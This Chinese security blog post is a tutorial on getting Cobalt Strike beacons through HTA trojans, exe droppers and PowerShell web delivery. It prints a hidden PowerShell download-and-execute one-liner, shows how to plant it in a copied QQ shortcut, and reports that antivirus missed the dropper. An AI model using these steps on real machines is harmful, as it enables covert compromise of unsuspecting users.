• 请使用爱安全论坛账号登陆本站 :)
  • 关注i安全微信公众号(i_Safe)第一时间获取最新资讯、优质文章。
  • 广告投放、商务合作、寻求报道、问题咨询请以邮件方式发送至blue@ixsec.org
  •    11个月前 (05-27)  网络安全 |   抢沙发  1736 
    文章评分 6 次,平均分 4.7

     

    0x00 简介

    Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。而Cobalt Strike 3.0已经不再使用Metasploit框架而作为一个独立的平台使用

    0x01 运行

    Cobalt Strike运行需要搭建团体服务器运行在Cobalt Strike目录下执行./teamserver ip 密码

    浅谈Cobalt strike获得beacon的几种方式

    接着在相同的目录打开终端 输入java -jar cobaltstrike.jar

    浅谈Cobalt strike获得beacon的几种方式

    用户名随便 密码就是刚才设置的密码我这里是2333

    0x02 攻击向量介绍

    cobaltstrike的attack–>packages包括:

    浅谈Cobalt strike获得beacon的几种方式

    HTML Application 生成恶意的HTA木马文件;

    MS Office Macro 生成office宏病毒文件;

    Payload Generator 生成各种语言版本的payload;

    USB/CD AutoPlay 生成利用自动播放运行的木马文件;

    Windows Dropper 捆绑器,能够对文档类进行捆绑;

    Windows Executable 生成可执行exe木马;

    Windows Executable(S)生成无状态的可执行exe木马。

    web Drive-by包括:浅谈Cobalt strike获得beacon的几种方式

    Manage对开启的web服务进行管理;

    Clone Site 克隆网站,可以记录受害者提交的数据;

    Host File 提供一个文件下载,可以修改Mime信息;

    PowerShell Web Delivery类似于msf web_delivery ;

    Signed Applet Attack 使用java自签名的程序进行钓鱼攻击;

    Smart Applet Attack 自动检测java版本并进行攻击,针对Java 1.6.0_45以下以及Java 1.7.0_21以下版本;

    System Profiler用来获取一些系统信息,比如系统版本,Flash版本,浏览器版本等。

    0x03 几种获得beacon的方式

    使用之前先创建一个监听器

    Cobalt Strike–>listener

    浅谈Cobalt strike获得beacon的几种方式

    点击sava 一个监听器就创建好了

    1,HTML Application 生成一个基于powershell的恶意HTA木马

    选中attack–>packages–>HTML Application

    浅谈Cobalt strike获得beacon的几种方式

    上面是选择刚刚创建好的saya监听器你也可以旁边add一个 下面是选择基于powershell的HTA木马

    点击Generate保存一个目录即可生成一个HTA木马

    目标点击HTA木马后即可获得一个beacon浅谈Cobalt strike获得beacon的几种方式

    2,MS Office Macro 生成office宏病毒文件

    这里可以参考:Office Phishing

    3,Windows Dropper 捆绑一个exe木马

    选中attack–>packages–>Windows Dropper

    浅谈Cobalt strike获得beacon的几种方式

    依旧用之前的监听器

    Embedded File选择要捆绑的exe

    file name是捆绑的名字 选择后Generate生成 目标点击后获得beacon

    浅谈Cobalt strike获得beacon的几种方式

    免杀性:windows10的杀软并没有报毒

    4,powershell web-Drive-by制作快捷方式后门

    依次选择attack–>web-Drive-by–>powershell Drive-by

    浅谈Cobalt strike获得beacon的几种方式

    Laubch生成之后会输出一条语句这条语句在powershell运行会得到一个beacon但是一般人不会这么傻去运行浅谈Cobalt strike获得beacon的几种方式

    powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.1.107:80/’))”

    我们随便复制一个软件的快捷方式浅谈Cobalt strike获得beacon的几种方式这里以QQ为例子目标复制上我们的语句 起始位置清空 选择应用之后目标点击快捷方式获得beacon浅谈Cobalt strike获得beacon的几种方式

    还有其他的模块其实都差不多

    如Signed Applet Attack  Smart Applet Attack和S.E.T的java攻击向量相同

    Host File 可以配合DNS欺骗实现挂马效果使用

    这里就不多BB了

    至于beacon的后渗透模块使用方式 请参考:Cobalt strike3.0使用手册

    作者:爱安全核心团队suzumiya

    QQ:1635123039

     

    除特别注明外,本站所有文章均为爱安全原创,转载请注明出处来自http://www.ixsec.org/hack/network/327.html

    关于

    发表评论

    暂无评论

    登录

    (可使用论坛帐号登录)

    忘记密码 ?

    切换登录

    注册

    扫一扫二维码分享